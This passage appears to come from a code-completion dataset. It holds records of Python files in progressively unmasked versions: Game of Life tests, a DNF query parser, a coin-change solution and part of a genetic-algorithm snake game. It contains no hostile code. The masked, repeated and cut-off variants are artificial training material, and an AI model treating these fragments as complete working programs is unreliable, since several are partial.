self.assertFalse(cell.will_survive(neighbours))
def test_will_not_survive_underpopulation(self):
cell = Cell(ALIVE)
neighbours = [1, 0, 0, 0, 0, 0, 0]
self.assertFalse(cell.will_survive(neighbours))
if __name__ == '__main__':
unittest.main()
|
flexible
|
{
"blob_id": "f644ff322d1268092dbdcbfc1a3c76006424184b",
"index": 1482,
"step-1": "<mask token>\n\n\nclass BoardTests(unittest.TestCase):\n\n def test_get_neighbours(self):\n board = create_test_board(3)\n self.assertListEqual(board.get_neighbour_states(1, 0), [None, None,\n ALIVE, ALIVE, DEAD, ALIVE, DEAD, None])\n\n def test_simple_update(self):\n alive_cells = [(0, 0), (1, 1), (0, 1)]\n board = Board(3)\n board.set_alive_cells(alive_cells)\n board.update()\n states = board.list_of_values\n self.assertListEqual(states, [[1, 1, 0], [1, 1, 0], [0, 0, 0]])\n <mask token>\n <mask token>\n\n\nclass CellTest(unittest.TestCase):\n\n def test_is_alive(self):\n alive_cell = Cell(ALIVE)\n self.assertTrue(alive_cell.is_alive)\n dead_cell = Cell(DEAD)\n self.assertFalse(dead_cell.is_alive)\n\n def test_create_life(self):\n cell = Cell(DEAD)\n neighbours = [1, 1, 1, 0, 0, 0, 0, None, None]\n self.assertTrue(cell.will_survive(neighbours))\n\n def test_will_not_be_born(self):\n cell = Cell(DEAD)\n neighbours = [1, 1, 0, 0, 0, 0, 0]\n self.assertFalse(cell.will_survive(neighbours))\n neighbours = [1, 1, 1, 1, 0, 0, 0]\n self.assertFalse(cell.will_survive(neighbours))\n\n def test_stay_alive(self):\n cell = Cell(ALIVE)\n neighbours2 = [1, 1, 0, 0, 0, 0, None, None]\n self.assertTrue(cell.will_survive(neighbours2))\n neighbours3 = [1, 1, 1, 0, 0, 0, None, None]\n self.assertTrue(cell.will_survive(neighbours3))\n\n def test_will_not_survive_overpopulation(self):\n cell = Cell(ALIVE)\n neighbours = [1, 1, 1, 1, 0, 0, 0, 0]\n self.assertFalse(cell.will_survive(neighbours))\n\n def test_will_not_survive_underpopulation(self):\n cell = Cell(ALIVE)\n neighbours = [1, 0, 0, 0, 0, 0, 0]\n self.assertFalse(cell.will_survive(neighbours))\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\nclass BoardTests(unittest.TestCase):\n\n def test_get_neighbours(self):\n board = create_test_board(3)\n self.assertListEqual(board.get_neighbour_states(1, 0), [None, None,\n ALIVE, ALIVE, DEAD, ALIVE, DEAD, None])\n\n def test_simple_update(self):\n alive_cells = [(0, 0), (1, 1), (0, 1)]\n board = Board(3)\n board.set_alive_cells(alive_cells)\n board.update()\n states = board.list_of_values\n self.assertListEqual(states, [[1, 1, 0], [1, 1, 0], [0, 0, 0]])\n\n def test_simple_update2(self):\n init_config = [(0, 0), (0, 1), (0, 2)]\n board = Board(3)\n board.set_alive_cells(init_config)\n board.update()\n states = board.list_of_values\n self.assertListEqual(states, [[0, 1, 0], [0, 1, 0], [0, 0, 0]])\n <mask token>\n\n\nclass CellTest(unittest.TestCase):\n\n def test_is_alive(self):\n alive_cell = Cell(ALIVE)\n self.assertTrue(alive_cell.is_alive)\n dead_cell = Cell(DEAD)\n self.assertFalse(dead_cell.is_alive)\n\n def test_create_life(self):\n cell = Cell(DEAD)\n neighbours = [1, 1, 1, 0, 0, 0, 0, None, None]\n self.assertTrue(cell.will_survive(neighbours))\n\n def test_will_not_be_born(self):\n cell = Cell(DEAD)\n neighbours = [1, 1, 0, 0, 0, 0, 0]\n self.assertFalse(cell.will_survive(neighbours))\n neighbours = [1, 1, 1, 1, 0, 0, 0]\n self.assertFalse(cell.will_survive(neighbours))\n\n def test_stay_alive(self):\n cell = Cell(ALIVE)\n neighbours2 = [1, 1, 0, 0, 0, 0, None, None]\n self.assertTrue(cell.will_survive(neighbours2))\n neighbours3 = [1, 1, 1, 0, 0, 0, None, None]\n self.assertTrue(cell.will_survive(neighbours3))\n\n def test_will_not_survive_overpopulation(self):\n cell = Cell(ALIVE)\n neighbours = [1, 1, 1, 1, 0, 0, 0, 0]\n self.assertFalse(cell.will_survive(neighbours))\n\n def test_will_not_survive_underpopulation(self):\n cell = Cell(ALIVE)\n neighbours = [1, 0, 0, 0, 0, 0, 0]\n self.assertFalse(cell.will_survive(neighbours))\n\n\n<mask token>\n",
"step-3": "<mask token>\n\n\ndef create_test_board(size):\n board = Board(size)\n board[0, 0].state = ALIVE\n board[0, 1].state = ALIVE\n board[2, 1].state = ALIVE\n return board\n\n\nclass BoardTests(unittest.TestCase):\n\n def test_get_neighbours(self):\n board = create_test_board(3)\n self.assertListEqual(board.get_neighbour_states(1, 0), [None, None,\n ALIVE, ALIVE, DEAD, ALIVE, DEAD, None])\n\n def test_simple_update(self):\n alive_cells = [(0, 0), (1, 1), (0, 1)]\n board = Board(3)\n board.set_alive_cells(alive_cells)\n board.update()\n states = board.list_of_values\n self.assertListEqual(states, [[1, 1, 0], [1, 1, 0], [0, 0, 0]])\n\n def test_simple_update2(self):\n init_config = [(0, 0), (0, 1), (0, 2)]\n board = Board(3)\n board.set_alive_cells(init_config)\n board.update()\n states = board.list_of_values\n self.assertListEqual(states, [[0, 1, 0], [0, 1, 0], [0, 0, 0]])\n\n def test_overpopulation(self):\n init_config = [(0, 1), (1, 0), (1, 1), (1, 2), (2, 1)]\n board = Board(3)\n board.set_alive_cells(init_config)\n board.update()\n states = board.list_of_values\n self.assertListEqual(states, [[1, 1, 1], [1, 0, 1], [1, 1, 1]])\n\n\nclass CellTest(unittest.TestCase):\n\n def test_is_alive(self):\n alive_cell = Cell(ALIVE)\n self.assertTrue(alive_cell.is_alive)\n dead_cell = Cell(DEAD)\n self.assertFalse(dead_cell.is_alive)\n\n def test_create_life(self):\n cell = Cell(DEAD)\n neighbours = [1, 1, 1, 0, 0, 0, 0, None, None]\n self.assertTrue(cell.will_survive(neighbours))\n\n def test_will_not_be_born(self):\n cell = Cell(DEAD)\n neighbours = [1, 1, 0, 0, 0, 0, 0]\n self.assertFalse(cell.will_survive(neighbours))\n neighbours = [1, 1, 1, 1, 0, 0, 0]\n self.assertFalse(cell.will_survive(neighbours))\n\n def test_stay_alive(self):\n cell = Cell(ALIVE)\n neighbours2 = [1, 1, 0, 0, 0, 0, None, None]\n self.assertTrue(cell.will_survive(neighbours2))\n neighbours3 = [1, 1, 1, 0, 0, 0, None, None]\n self.assertTrue(cell.will_survive(neighbours3))\n\n def test_will_not_survive_overpopulation(self):\n cell = Cell(ALIVE)\n neighbours = [1, 1, 1, 1, 0, 0, 0, 0]\n self.assertFalse(cell.will_survive(neighbours))\n\n def test_will_not_survive_underpopulation(self):\n cell = Cell(ALIVE)\n neighbours = [1, 0, 0, 0, 0, 0, 0]\n self.assertFalse(cell.will_survive(neighbours))\n\n\nif __name__ == '__main__':\n unittest.main()\n",
"step-4": "import unittest\nfrom game_of_life.board import Board\nfrom game_of_life.cell import Cell, ALIVE, DEAD\n\n\ndef create_test_board(size):\n board = Board(size)\n board[0, 0].state = ALIVE\n board[0, 1].state = ALIVE\n board[2, 1].state = ALIVE\n return board\n\n\nclass BoardTests(unittest.TestCase):\n\n def test_get_neighbours(self):\n board = create_test_board(3)\n self.assertListEqual(board.get_neighbour_states(1, 0), [None, None,\n ALIVE, ALIVE, DEAD, ALIVE, DEAD, None])\n\n def test_simple_update(self):\n alive_cells = [(0, 0), (1, 1), (0, 1)]\n board = Board(3)\n board.set_alive_cells(alive_cells)\n board.update()\n states = board.list_of_values\n self.assertListEqual(states, [[1, 1, 0], [1, 1, 0], [0, 0, 0]])\n\n def test_simple_update2(self):\n init_config = [(0, 0), (0, 1), (0, 2)]\n board = Board(3)\n board.set_alive_cells(init_config)\n board.update()\n states = board.list_of_values\n self.assertListEqual(states, [[0, 1, 0], [0, 1, 0], [0, 0, 0]])\n\n def test_overpopulation(self):\n init_config = [(0, 1), (1, 0), (1, 1), (1, 2), (2, 1)]\n board = Board(3)\n board.set_alive_cells(init_config)\n board.update()\n states = board.list_of_values\n self.assertListEqual(states, [[1, 1, 1], [1, 0, 1], [1, 1, 1]])\n\n\nclass CellTest(unittest.TestCase):\n\n def test_is_alive(self):\n alive_cell = Cell(ALIVE)\n self.assertTrue(alive_cell.is_alive)\n dead_cell = Cell(DEAD)\n self.assertFalse(dead_cell.is_alive)\n\n def test_create_life(self):\n cell = Cell(DEAD)\n neighbours = [1, 1, 1, 0, 0, 0, 0, None, None]\n self.assertTrue(cell.will_survive(neighbours))\n\n def test_will_not_be_born(self):\n cell = Cell(DEAD)\n neighbours = [1, 1, 0, 0, 0, 0, 0]\n self.assertFalse(cell.will_survive(neighbours))\n neighbours = [1, 1, 1, 1, 0, 0, 0]\n self.assertFalse(cell.will_survive(neighbours))\n\n def test_stay_alive(self):\n cell = Cell(ALIVE)\n neighbours2 = [1, 1, 0, 0, 0, 0, None, None]\n self.assertTrue(cell.will_survive(neighbours2))\n neighbours3 = [1, 1, 1, 0, 0, 0, None, None]\n self.assertTrue(cell.will_survive(neighbours3))\n\n def test_will_not_survive_overpopulation(self):\n cell = Cell(ALIVE)\n neighbours = [1, 1, 1, 1, 0, 0, 0, 0]\n self.assertFalse(cell.will_survive(neighbours))\n\n def test_will_not_survive_underpopulation(self):\n cell = Cell(ALIVE)\n neighbours = [1, 0, 0, 0, 0, 0, 0]\n self.assertFalse(cell.will_survive(neighbours))\n\n\nif __name__ == '__main__':\n unittest.main()\n",
"step-5": "import unittest\nfrom game_of_life.board import Board\nfrom game_of_life.cell import Cell, ALIVE, DEAD\n\n\ndef create_test_board(size):\n board = Board(size)\n board[0, 0].state = ALIVE\n board[0, 1].state = ALIVE\n board[2, 1].state = ALIVE\n return board\n\n\nclass BoardTests(unittest.TestCase):\n def test_get_neighbours(self):\n board = create_test_board(3)\n self.assertListEqual(board.get_neighbour_states(1, 0), [\n None, None, ALIVE,\n ALIVE, DEAD,\n ALIVE, DEAD, None\n ])\n\n def test_simple_update(self):\n alive_cells = [(0, 0), (1, 1), (0, 1)]\n board = Board(3)\n board.set_alive_cells(alive_cells)\n board.update()\n states = board.list_of_values\n self.assertListEqual(states, [\n [1, 1, 0],\n [1, 1, 0],\n [0, 0, 0]\n ])\n\n def test_simple_update2(self):\n init_config = [(0, 0), (0, 1), (0, 2)]\n board = Board(3)\n board.set_alive_cells(init_config)\n board.update()\n states = board.list_of_values\n self.assertListEqual(states, [\n [0, 1, 0],\n [0, 1, 0],\n [0, 0, 0]\n ])\n\n def test_overpopulation(self):\n init_config = [(0, 1), (1, 0), (1, 1), (1, 2), (2, 1)]\n board = Board(3)\n board.set_alive_cells(init_config)\n board.update()\n states = board.list_of_values\n self.assertListEqual(states, [\n [1, 1, 1],\n [1, 0, 1],\n [1, 1, 1]\n ])\n\n\nclass CellTest(unittest.TestCase):\n def test_is_alive(self):\n alive_cell = Cell(ALIVE)\n self.assertTrue(alive_cell.is_alive)\n\n dead_cell = Cell(DEAD)\n self.assertFalse(dead_cell.is_alive)\n\n def test_create_life(self):\n cell = Cell(DEAD)\n neighbours = [1, 1, 1, 0, 0, 0, 0, None, None]\n self.assertTrue(cell.will_survive(neighbours))\n\n def test_will_not_be_born(self):\n cell = Cell(DEAD)\n neighbours = [1, 1, 0, 0, 0, 0, 0,]\n self.assertFalse(cell.will_survive(neighbours))\n neighbours = [1, 1, 1, 1, 0, 0, 0]\n self.assertFalse(cell.will_survive(neighbours))\n\n def test_stay_alive(self):\n cell = Cell(ALIVE)\n neighbours2 = [1, 1, 0, 0, 0, 0, None, None]\n self.assertTrue(cell.will_survive(neighbours2))\n neighbours3 = [1, 1, 1, 0, 0, 0, None, None]\n self.assertTrue(cell.will_survive(neighbours3))\n\n def test_will_not_survive_overpopulation(self):\n cell = Cell(ALIVE)\n neighbours = [1, 1, 1, 1, 0, 0, 0, 0]\n self.assertFalse(cell.will_survive(neighbours))\n\n def test_will_not_survive_underpopulation(self):\n cell = Cell(ALIVE)\n neighbours = [1, 0, 0, 0, 0, 0, 0]\n self.assertFalse(cell.will_survive(neighbours))\n\n\nif __name__ == '__main__':\n unittest.main()\n",
"step-ids": [
10,
11,
14,
15,
16
]
}
|
[
10,
11,
14,
15,
16
] |
import dnf_converter
def parse(query):
print("parsing the query...")
query = dnf_converter.convert(query)
cp_clause_list = []
clause_list = []
for cp in query["$or"]:
clauses = []
if "$and" in cp:
for clause in cp["$and"]:
clauses.append(clause)
clause_list.append(clause)
else:
clause = cp
clauses.append(clause)
clause_list.append(clause)
cp_clause_list.append({ "cp": cp, "clauses": clauses })
return cp_clause_list, clause_list
|
normal
|
{
"blob_id": "999de0965efa3c1fe021142a105dcf28184cd5ba",
"index": 43,
"step-1": "<mask token>\n",
"step-2": "<mask token>\n\n\ndef parse(query):\n print('parsing the query...')\n query = dnf_converter.convert(query)\n cp_clause_list = []\n clause_list = []\n for cp in query['$or']:\n clauses = []\n if '$and' in cp:\n for clause in cp['$and']:\n clauses.append(clause)\n clause_list.append(clause)\n else:\n clause = cp\n clauses.append(clause)\n clause_list.append(clause)\n cp_clause_list.append({'cp': cp, 'clauses': clauses})\n return cp_clause_list, clause_list\n",
"step-3": "import dnf_converter\n\n\ndef parse(query):\n print('parsing the query...')\n query = dnf_converter.convert(query)\n cp_clause_list = []\n clause_list = []\n for cp in query['$or']:\n clauses = []\n if '$and' in cp:\n for clause in cp['$and']:\n clauses.append(clause)\n clause_list.append(clause)\n else:\n clause = cp\n clauses.append(clause)\n clause_list.append(clause)\n cp_clause_list.append({'cp': cp, 'clauses': clauses})\n return cp_clause_list, clause_list\n",
"step-4": "import dnf_converter\n\ndef parse(query):\n\tprint(\"parsing the query...\")\n\tquery = dnf_converter.convert(query)\n\tcp_clause_list = []\n\tclause_list = []\n\tfor cp in query[\"$or\"]:\n\t\tclauses = []\n\t\tif \"$and\" in cp:\n\t\t\tfor clause in cp[\"$and\"]:\n\t\t\t\tclauses.append(clause)\n\t\t\t\tclause_list.append(clause)\n\t\telse:\n\t\t\tclause = cp\n\t\t\tclauses.append(clause)\n\t\t\tclause_list.append(clause)\n\t\tcp_clause_list.append({ \"cp\": cp, \"clauses\": clauses })\n\treturn cp_clause_list, clause_list",
"step-5": null,
"step-ids": [
0,
1,
2,
3
]
}
|
[
0,
1,
2,
3
] |
<|reserved_special_token_0|>
class Solution:
<|reserved_special_token_0|>
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class Solution:
def change(self, amount: int, coins: List[int]) ->int:
coins = sorted(coins, reverse=True)
@lru_cache(None)
def rec(i, amount):
if i == len(coins):
return 1 if amount == 0 else 0
return sum(rec(i + 1, amount - c) for c in range(0, amount + 1,
coins[i]))
return rec(0, amount)
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class Solution:
def change(self, amount: int, coins: List[int]) ->int:
coins = sorted(coins, reverse=True)
@lru_cache(None)
def rec(i, amount):
if i == len(coins):
return 1 if amount == 0 else 0
return sum(rec(i + 1, amount - c) for c in range(0, amount + 1,
coins[i]))
return rec(0, amount)
@pytest.mark.parametrize('amount, coins, expected', [(5, [1, 2, 5], 4), (3,
[2], 0), (10, [10], 1)])
def test(amount, coins, expected):
assert expected == Solution().change(amount, coins)
if __name__ == '__main__':
sys.exit(pytest.main(['-s', '-v'] + sys.argv))
<|reserved_special_token_1|>
<|reserved_special_token_0|>
import sys
from functools import lru_cache
from typing import List
import pytest
class Solution:
def change(self, amount: int, coins: List[int]) ->int:
coins = sorted(coins, reverse=True)
@lru_cache(None)
def rec(i, amount):
if i == len(coins):
return 1 if amount == 0 else 0
return sum(rec(i + 1, amount - c) for c in range(0, amount + 1,
coins[i]))
return rec(0, amount)
@pytest.mark.parametrize('amount, coins, expected', [(5, [1, 2, 5], 4), (3,
[2], 0), (10, [10], 1)])
def test(amount, coins, expected):
assert expected == Solution().change(amount, coins)
if __name__ == '__main__':
sys.exit(pytest.main(['-s', '-v'] + sys.argv))
<|reserved_special_token_1|>
#! /usr/bin/env python
# -*- coding: utf-8 -*-
# vim:fenc=utf-8
#
# Copyright © 2020 sungminoh <[email protected]>
#
# Distributed under terms of the MIT license.
"""
You are given coins of different denominations and a total amount of money. Write a function to compute the number of combinations that make up that amount. You may assume that you have infinite number of each kind of coin.
Example 1:
Input: amount = 5, coins = [1, 2, 5]
Output: 4
Explanation: there are four ways to make up the amount:
5=5
5=2+2+1
5=2+1+1+1
5=1+1+1+1+1
Example 2:
Input: amount = 3, coins = [2]
Output: 0
Explanation: the amount of 3 cannot be made up just with coins of 2.
Example 3:
Input: amount = 10, coins = [10]
Output: 1
Note:
You can assume that
1. 0 <= amount <= 5000
2. 1 <= coin <= 5000
3. the number of coins is less than 500
4. the answer is guaranteed to fit into signed 32-bit integer
"""
import sys
from functools import lru_cache
from typing import List
import pytest
class Solution:
def change(self, amount: int, coins: List[int]) -> int:
coins = sorted(coins, reverse=True)
@lru_cache(None)
def rec(i, amount):
if i == len(coins):
return 1 if amount == 0 else 0
return sum(rec(i+1, amount-c) for c in range(0, amount+1, coins[i]))
return rec(0, amount)
@pytest.mark.parametrize('amount, coins, expected', [
(5, [1,2,5], 4),
(3, [2], 0),
(10, [10], 1),
])
def test(amount, coins, expected):
assert expected == Solution().change(amount, coins)
if __name__ == '__main__':
sys.exit(pytest.main(["-s", "-v"] + sys.argv))
|
flexible
|
{
"blob_id": "332c530d221c9441d6ff3646f8e9226dc78067f9",
"index": 2902,
"step-1": "<mask token>\n\n\nclass Solution:\n <mask token>\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\nclass Solution:\n\n def change(self, amount: int, coins: List[int]) ->int:\n coins = sorted(coins, reverse=True)\n\n @lru_cache(None)\n def rec(i, amount):\n if i == len(coins):\n return 1 if amount == 0 else 0\n return sum(rec(i + 1, amount - c) for c in range(0, amount + 1,\n coins[i]))\n return rec(0, amount)\n\n\n<mask token>\n",
"step-3": "<mask token>\n\n\nclass Solution:\n\n def change(self, amount: int, coins: List[int]) ->int:\n coins = sorted(coins, reverse=True)\n\n @lru_cache(None)\n def rec(i, amount):\n if i == len(coins):\n return 1 if amount == 0 else 0\n return sum(rec(i + 1, amount - c) for c in range(0, amount + 1,\n coins[i]))\n return rec(0, amount)\n\n\[email protected]('amount, coins, expected', [(5, [1, 2, 5], 4), (3,\n [2], 0), (10, [10], 1)])\ndef test(amount, coins, expected):\n assert expected == Solution().change(amount, coins)\n\n\nif __name__ == '__main__':\n sys.exit(pytest.main(['-s', '-v'] + sys.argv))\n",
"step-4": "<mask token>\nimport sys\nfrom functools import lru_cache\nfrom typing import List\nimport pytest\n\n\nclass Solution:\n\n def change(self, amount: int, coins: List[int]) ->int:\n coins = sorted(coins, reverse=True)\n\n @lru_cache(None)\n def rec(i, amount):\n if i == len(coins):\n return 1 if amount == 0 else 0\n return sum(rec(i + 1, amount - c) for c in range(0, amount + 1,\n coins[i]))\n return rec(0, amount)\n\n\[email protected]('amount, coins, expected', [(5, [1, 2, 5], 4), (3,\n [2], 0), (10, [10], 1)])\ndef test(amount, coins, expected):\n assert expected == Solution().change(amount, coins)\n\n\nif __name__ == '__main__':\n sys.exit(pytest.main(['-s', '-v'] + sys.argv))\n",
"step-5": "\n#! /usr/bin/env python\n# -*- coding: utf-8 -*-\n# vim:fenc=utf-8\n#\n# Copyright © 2020 sungminoh <[email protected]>\n#\n# Distributed under terms of the MIT license.\n\n\"\"\"\nYou are given coins of different denominations and a total amount of money. Write a function to compute the number of combinations that make up that amount. You may assume that you have infinite number of each kind of coin.\n\nExample 1:\n\nInput: amount = 5, coins = [1, 2, 5]\nOutput: 4\nExplanation: there are four ways to make up the amount:\n5=5\n5=2+2+1\n5=2+1+1+1\n5=1+1+1+1+1\n\nExample 2:\n\nInput: amount = 3, coins = [2]\nOutput: 0\nExplanation: the amount of 3 cannot be made up just with coins of 2.\n\nExample 3:\n\nInput: amount = 10, coins = [10]\nOutput: 1\n\nNote:\n\nYou can assume that\n 1. 0 <= amount <= 5000\n 2. 1 <= coin <= 5000\n 3. the number of coins is less than 500\n 4. the answer is guaranteed to fit into signed 32-bit integer\n\"\"\"\nimport sys\nfrom functools import lru_cache\nfrom typing import List\nimport pytest\n\n\nclass Solution:\n def change(self, amount: int, coins: List[int]) -> int:\n coins = sorted(coins, reverse=True)\n @lru_cache(None)\n def rec(i, amount):\n if i == len(coins):\n return 1 if amount == 0 else 0\n return sum(rec(i+1, amount-c) for c in range(0, amount+1, coins[i]))\n return rec(0, amount)\n\n\[email protected]('amount, coins, expected', [\n (5, [1,2,5], 4),\n (3, [2], 0),\n (10, [10], 1),\n])\ndef test(amount, coins, expected):\n assert expected == Solution().change(amount, coins)\n\n\nif __name__ == '__main__':\n sys.exit(pytest.main([\"-s\", \"-v\"] + sys.argv))\n\n",
"step-ids": [
1,
2,
4,
5,
6
]
}
|
[
1,
2,
4,
5,
6
] |
<|reserved_special_token_0|>
def save_pool():
for i in range(total_models):
current_pool[i].save_weights(save_location + str(i) + '.keras')
print('Pool saved')
def create_model():
"""
Create Neural Network as a keras model
"""
model = Sequential()
model.add(Dense(12, input_dim=8, activation='relu'))
model.add(Dense(16, activation='relu'))
model.add(Dense(4, activation='sigmoid'))
model.compile(loss='mse', optimizer='adam')
return model
def predict_direction(snake, fruit, model_num):
"""
This function feeds information into the model, then determines
which direction the snake should go
"""
direction = snake.check_head()
fruit = snake.check_fruit(fruit)
n_input = np.concatenate([direction, fruit])
n_input = np.atleast_2d(n_input)
output = current_pool[model_num].predict(n_input, 1)
return output.argmax()
<|reserved_special_token_0|>
def model_mutate(weights):
"""
Mutate the weights of a model
"""
for i in range(len(weights)):
for j in range(len(weights[i])):
if random.uniform(0, 1) > 0.7:
change = random.uniform(-0.5, 0.5)
weights[i][j] += change
return weights
<|reserved_special_token_0|>
class App:
"""
Main App for game
"""
def __init__(self):
self._running = True
self._display_surf = None
self.size = self.width, self.height = WIDTH, HEIGHT
self.clock = None
self.snake = Snake()
self.fruit = Fruit()
self.pause = False
self.moves = 0
self.frames = 11
def on_init(self):
pygame.init()
self._display_surf = pygame.display.set_mode(self.size, pygame.
HWSURFACE | pygame.DOUBLEBUF)
self._running = True
self.clock = pygame.time.Clock()
def on_event(self, event):
if event.type == pygame.QUIT:
self._running = False
if event.type == pygame.KEYDOWN:
if event.key == K_UP:
if self.frames < 1000000000:
self.frames *= 10
elif event.key == K_DOWN:
if self.frames > 10:
self.frames /= 10
elif event.key == K_p:
self.pause = not self.pause
elif event.key == K_q:
self.on_cleanup()
def on_loop(self, model_num):
self.snake.alive = self.snake.collision(self.snake.position[0])
if self.snake.alive is False:
return
if self.snake.eat(self.fruit) is True:
fitness[model_num] += 150
score[model_num] += 1
self.moves = 0
self.snake.update()
if check_if_closer(self.snake, self.fruit):
fitness[model_num] += 10
self.moves += 1
def on_render(self, model_num):
self._display_surf.fill((0, 124, 0))
for i in range(0, int(GRID_D)):
for j in range(0, int(GRID_D)):
if (i + j) % 2 == 0:
block = pygame.Rect(((j * BLOCK_W, i * BLOCK_H), (
BLOCK_W, BLOCK_H)))
pygame.draw.rect(self._display_surf, (0, 200, 0), block)
self.fruit.draw(self._display_surf)
self.snake.draw(self._display_surf)
pygame.display.set_caption('Gen: ' + str(generation) + ' Model: ' +
str(model_num) + ' Score: ' + str(self.snake.score) + ' Tick ' +
str(self.frames))
pygame.display.update()
def on_cleanup(self):
pygame.quit()
sys.exit()
def on_execute(self, i):
if self.on_init() == False:
self._running = False
while self._running:
for event in pygame.event.get():
self.on_event(event)
self.snake.direction = predict_direction(self.snake, self.fruit, i)
if self.pause is False:
self.on_loop(i)
self.on_render(i)
self.clock.tick(self.frames)
if self.snake.alive == False or self.moves == MAX_MOVES:
print(int(self.snake.score))
self.snake.reset()
self.fruit.random_generate()
self.moves = 0
print(fitness[i])
break
print(int(self.snake.score))
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
def save_pool():
for i in range(total_models):
current_pool[i].save_weights(save_location + str(i) + '.keras')
print('Pool saved')
def create_model():
"""
Create Neural Network as a keras model
"""
model = Sequential()
model.add(Dense(12, input_dim=8, activation='relu'))
model.add(Dense(16, activation='relu'))
model.add(Dense(4, activation='sigmoid'))
model.compile(loss='mse', optimizer='adam')
return model
def predict_direction(snake, fruit, model_num):
"""
This function feeds information into the model, then determines
which direction the snake should go
"""
direction = snake.check_head()
fruit = snake.check_fruit(fruit)
n_input = np.concatenate([direction, fruit])
n_input = np.atleast_2d(n_input)
output = current_pool[model_num].predict(n_input, 1)
return output.argmax()
<|reserved_special_token_0|>
def model_mutate(weights):
"""
Mutate the weights of a model
"""
for i in range(len(weights)):
for j in range(len(weights[i])):
if random.uniform(0, 1) > 0.7:
change = random.uniform(-0.5, 0.5)
weights[i][j] += change
return weights
def roulette_selection(total_fitness):
global fitness
choice = random.randint(0, total_fitness)
parent = 0
current = 0
for idx in range(total_models):
current += fitness[idx]
if current > choice:
parent = idx
break
return parent
def genetic_updates():
global current_pool
global fitness
global generation
new_weights = []
total_fitness = sum(fitness)
for i in range(total_models // 2):
parent_1 = roulette_selection(total_fitness)
parent_2 = roulette_selection(total_fitness)
new = model_crossover(parent_1, parent_2)
update_w1 = model_mutate(new[0])
update_w2 = model_mutate(new[1])
new_weights.append(update_w1)
new_weights.append(update_w2)
for i in range(len(new_weights)):
current_pool[i].set_weights(new_weights[i])
generation += 1
return
<|reserved_special_token_0|>
class App:
"""
Main App for game
"""
def __init__(self):
self._running = True
self._display_surf = None
self.size = self.width, self.height = WIDTH, HEIGHT
self.clock = None
self.snake = Snake()
self.fruit = Fruit()
self.pause = False
self.moves = 0
self.frames = 11
def on_init(self):
pygame.init()
self._display_surf = pygame.display.set_mode(self.size, pygame.
HWSURFACE | pygame.DOUBLEBUF)
self._running = True
self.clock = pygame.time.Clock()
def on_event(self, event):
if event.type == pygame.QUIT:
self._running = False
if event.type == pygame.KEYDOWN:
if event.key == K_UP:
if self.frames < 1000000000:
self.frames *= 10
elif event.key == K_DOWN:
if self.frames > 10:
self.frames /= 10
elif event.key == K_p:
self.pause = not self.pause
elif event.key == K_q:
self.on_cleanup()
def on_loop(self, model_num):
self.snake.alive = self.snake.collision(self.snake.position[0])
if self.snake.alive is False:
return
if self.snake.eat(self.fruit) is True:
fitness[model_num] += 150
score[model_num] += 1
self.moves = 0
self.snake.update()
if check_if_closer(self.snake, self.fruit):
fitness[model_num] += 10
self.moves += 1
def on_render(self, model_num):
self._display_surf.fill((0, 124, 0))
for i in range(0, int(GRID_D)):
for j in range(0, int(GRID_D)):
if (i + j) % 2 == 0:
block = pygame.Rect(((j * BLOCK_W, i * BLOCK_H), (
BLOCK_W, BLOCK_H)))
pygame.draw.rect(self._display_surf, (0, 200, 0), block)
self.fruit.draw(self._display_surf)
self.snake.draw(self._display_surf)
pygame.display.set_caption('Gen: ' + str(generation) + ' Model: ' +
str(model_num) + ' Score: ' + str(self.snake.score) + ' Tick ' +
str(self.frames))
pygame.display.update()
def on_cleanup(self):
pygame.quit()
sys.exit()
def on_execute(self, i):
if self.on_init() == False:
self._running = False
while self._running:
for event in pygame.event.get():
self.on_event(event)
self.snake.direction = predict_direction(self.snake, self.fruit, i)
if self.pause is False:
self.on_loop(i)
self.on_render(i)
self.clock.tick(self.frames)
if self.snake.alive == False or self.moves == MAX_MOVES:
print(int(self.snake.score))
self.snake.reset()
self.fruit.random_generate()
self.moves = 0
print(fitness[i])
break
print(int(self.snake.score))
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
def save_pool():
for i in range(total_models):
current_pool[i].save_weights(save_location + str(i) + '.keras')
print('Pool saved')
def create_model():
"""
Create Neural Network as a keras model
"""
model = Sequential()
model.add(Dense(12, input_dim=8, activation='relu'))
model.add(Dense(16, activation='relu'))
model.add(Dense(4, activation='sigmoid'))
model.compile(loss='mse', optimizer='adam')
return model
def predict_direction(snake, fruit, model_num):
"""
This function feeds information into the model, then determines
which direction the snake should go
"""
direction = snake.check_head()
fruit = snake.check_fruit(fruit)
n_input = np.concatenate([direction, fruit])
n_input = np.atleast_2d(n_input)
output = current_pool[model_num].predict(n_input, 1)
return output.argmax()
def model_crossover(parent_1, parent_2):
"""
Produce offspring based on the best parents
"""
global current_pool
weight1 = current_pool[parent_1].get_weights()
weight2 = current_pool[parent_2].get_weights()
new_weight1 = weight1
new_weight2 = weight2
gene = random.randint(0, len(new_weight1) - 1)
new_weight1[gene] = weight2[gene]
new_weight2[gene] = weight1[gene]
return np.asarray([new_weight1, new_weight2])
def model_mutate(weights):
"""
Mutate the weights of a model
"""
for i in range(len(weights)):
for j in range(len(weights[i])):
if random.uniform(0, 1) > 0.7:
change = random.uniform(-0.5, 0.5)
weights[i][j] += change
return weights
def roulette_selection(total_fitness):
global fitness
choice = random.randint(0, total_fitness)
parent = 0
current = 0
for idx in range(total_models):
current += fitness[idx]
if current > choice:
parent = idx
break
return parent
def genetic_updates():
global current_pool
global fitness
global generation
new_weights = []
total_fitness = sum(fitness)
for i in range(total_models // 2):
parent_1 = roulette_selection(total_fitness)
parent_2 = roulette_selection(total_fitness)
new = model_crossover(parent_1, parent_2)
update_w1 = model_mutate(new[0])
update_w2 = model_mutate(new[1])
new_weights.append(update_w1)
new_weights.append(update_w2)
for i in range(len(new_weights)):
current_pool[i].set_weights(new_weights[i])
generation += 1
return
<|reserved_special_token_0|>
class App:
"""
Main App for game
"""
def __init__(self):
self._running = True
self._display_surf = None
self.size = self.width, self.height = WIDTH, HEIGHT
self.clock = None
self.snake = Snake()
self.fruit = Fruit()
self.pause = False
self.moves = 0
self.frames = 11
def on_init(self):
pygame.init()
self._display_surf = pygame.display.set_mode(self.size, pygame.
HWSURFACE | pygame.DOUBLEBUF)
self._running = True
